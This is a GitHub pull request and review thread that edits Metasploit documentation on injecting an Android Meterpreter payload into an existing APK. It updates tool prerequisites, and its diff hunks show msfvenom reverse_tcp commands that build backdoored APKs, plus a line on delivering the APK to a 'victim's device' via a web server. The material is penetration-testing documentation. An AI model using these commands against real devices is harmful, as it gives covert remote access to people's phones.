### PR TITLE
Update injection.md

### PR DESCRIPTION
**Pull request by anshiq**
Edited injection.md 
 updated some requirnments,

### CODE REVIEW

File: documentation/modules/payload/android/meterpreter/injection.md [hunk 1]
```diff
@@ -31,12 +31,13 @@ $ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk
...
+* [Java](https://www.oracle.com/java/technologies/downloads/) - Used for building/editing APK
 * [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
 * [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates
-* [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK
+* [apksigner](https://developer.android.com/studio/command-line/apksigner) - To re-sign the APK
 
 Installing these tools (if they are not installed already) will depend on your OS.
-Apktool can be installed manually or automatically (e.g `brew install apktool`).
+Apktool can be installed manually or automatically (e.g `brew install apktool` OR `apt install apktool`).
 keytool and jarsigner can be installed by installing the appropriate JDK.
```
Comment (bcoles) [inline documentation/modules/payload/android/meterpreter/injection.md:41]: `jarsigner` is no longer required. `apksigner` is used instead.

`apksigner` can be installed on Linux with `apt install apksigner`. I'm not sure about OSX - `brew install apksigner` might work.

Comment (Anshik-Singh) [reply documentation/modules/payload/android/meterpreter/injection.md]: Yes I updated injection.md by your given information.

Comment (bcoles) [reply documentation/modules/payload/android/meterpreter/injection.md]: `keytool` is still required but the comment about installing the appropriate JDK has been removed.

**Comment by Anshik-Singh** [comment]
Are these ready to be merged.

**Comment by Anshik-Singh** [comment]
hi, anyone here. Are these changes good enough to be merged.

**Comment by Anshik-Singh** [comment]
Hi, any one here please tell are these changes valid to be merge.

File: documentation/modules/payload/android/meterpreter/injection.md [hunk 2]
```diff
@@ -31,21 +31,32 @@ $ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk
...
 ```
 ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
 ```
 
-Next, start an Android device. Upload the APK, and execute it, as you would with
+## Create Meterpreter APK File
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
```
Comment (bcoles) [inline documentation/modules/payload/android/meterpreter/injection.md:54]: This section is effectively the same as the `Verification Steps` section above.

File: documentation/modules/payload/android/meterpreter/injection.md [hunk 3]
```diff
@@ -31,21 +31,32 @@ $ adb pull /data/app/com.existing.app-1/base.apk com.existing.apk
...
+## Sending apk to other Devices:
+
+There are many method to send APK to victim's device but one of the easiest methods is using a web server.
+
```
Comment (bcoles) [inline documentation/modules/payload/android/meterpreter/injection.md:58]: This scenario, and others, is already described in the [reverse_tcp](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md) documentation linked below.

**Comment by Anshik-Singh** [comment]
Then why was this doc wrote 4 years ago , It was already present in your given link.

**Comment by gwillcox-r7** [comment]
Please run `tools/dev/msftidy_docs.rb documentation/modules/payload/android/meterpreter/injection.md` and fix the issues mentioned there.

**Comment by Anshik-Singh** [comment]
I don't get it  please tell me problems only related to documentation/modules/payload/android/meterpreter/injection.md
I am unable to fix the issue given by you, Thank you.

**Comment by gwillcox-r7** [comment]
> I don't get it please tell me problems only related to documentation/modules/payload/android/meterpreter/injection.md I am unable to fix the issue given by you, Thank you.

To answer your questions, yes this is related to the file you mentioned.

As for how to run this, its a command. Go to the base of your Metasploit install and then run the command `tools/dev/msftidy_docs.rb documentation/modules/payload/android/meterpreter/injection.md`. It should result in some output including potential errors with the documentation. You will need to fix those errors as best you can, can ignore the ones r.e line length for the time being.

**Comment by Anshik-Singh** [comment]
can i run this command in inbuilt metasploit framework of kali linux or parrot os.

**Comment by gwillcox-r7** [comment]
@anshiq Any update on making the requested changes?

**Comment by anshiq** [comment]
I am sorry @gwillcox-r7 , I am quiet busy. I am preparing for  college entrance exam in India. After 2 months may be I will free. So, I have no more update on these changes. Thankyou.

**Comment by gwillcox-r7** [comment]
No problem @anshiq will keep this open and mark it as delayed so it doesn't get mistakenly closed by accident. Good luck with your exams and we can take a look at this again once your done 👍

**Pull request closed without merging**